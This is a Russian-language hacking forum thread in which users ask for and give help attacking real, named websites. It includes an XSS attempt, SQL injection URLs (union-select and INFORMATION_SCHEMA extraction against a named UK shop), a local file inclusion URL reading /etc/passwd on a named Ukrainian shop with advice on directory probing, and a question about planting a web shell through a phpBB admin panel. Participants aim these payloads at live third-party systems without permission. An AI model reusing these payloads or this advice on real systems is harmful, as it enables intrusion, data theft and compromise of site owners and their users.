Ваши вопросы по уязвимостям.

хм.. вот тут наткнулся на сайт:

в обцем если менять значение переменной pageAlias то меняется и вывод на странице.. можно ли с этим что-нибудь сотворить?

 

-Есть про-печатка символов "> пытаюсь вбить в URL "><script>Ealert('fgf')</script>
но окошко с xss не вылетает что я не так делаю ?

 

Mo4x, я не очень понял что у тебя там есть, но возможно просто фильтруюца кавычки. Попробуй вместо них написать слэши (/fgf/), в алерте есессна. А вообще лучше просто ссылку кинь, можешь в личку, если не хочешь светить.

 

http://league.russiangun.ru/rgl/match.php?matchid='
Тут слепая иньекция или я чтото путаю?

 

js должен быть на странице, а не только в урле

 

Просканировал тут один сайт с помощью Reverse IP,вот он выдал:

site.ru has the IP address: xxx.xxx.xx.xxx
425 found with the IP xxx.xxx.xx.xxx

То бишь с таким айпи существует ещё 425 сайтов, и хостятся на ком-то.Это вообще реальное число или меня плющит?

 

а почему бы и не существовать? это норально впринципе.. есть хостеры на которых и побольше висит..

 

Велемир кто знает куда хостеры катяться

 

Есть админка phpBB 2.0.22, нужно залить шелл. Вопрос - если я просто восстановлю бд форума с одной нужной мне строчкой, то вся база сотрется или допишется только эта строчка, а бд останется в целости ?

 

выдает ошибку..

help

0nep@t0p
rewrite

 

ну так ... тебе пишет что разное количество параметров...

Code:

http://www.bjsornamentalkoi.co.uk/product.asp?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

 

2 sabe
А что хелп то? Крути всё нормально MSSQL
_http://www.bjsornamentalkoi.co.uk/product.asp?product_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('links','links_category'))--
2 theli
Забавно

 

Хм...А имена таблиц и полей(если стоят по умолчанию) на всех хостящихся на нём сайтов - одинаковые ?

 

ой, чёго-то совсем забыл что оно так удобно пишет ошибки

 

спс... я просто не люблю microsoft

 

надо смотреть по обстоятельствам... например на хостинге висят два форума на двух разных сайтах.. если движки самописные то названия таблиц и колонок такое как в движке задаано было... а если паблик движки то там названия таблиц и колонок можно узнать поставив себе на локалхост или еще куда-нибудь форум и посмотрев (не будешь же ты во всех скриптах менять название таблицы и колонок=))...

 

http://shop.tuse.com.ua/basket/?mode=../../../../../../../../etc/passwd%00&id=43
есть лькальный инклуд,что с ним можно сделать? =\

 

при помощи него можно смотреть различные файлы на сервере..
можно еще проверять наличие папок, например так:

Code:

 www.site.com/script.php?page=../../../../../../../../var/www/../../etc/passwd

где вместо /var/www ты подставляешь проверяемую папку
если выведется содержимое /etc/passwd то значит папка существует, если выскочит ошибка - то нет такой страницы.. соответстветсвенно проверяй другие места..

 

Red_Red1,скинь плз ссылку в приват.(с розруленой скулей)

 

Подставляю кавычку, выплевывает следующее: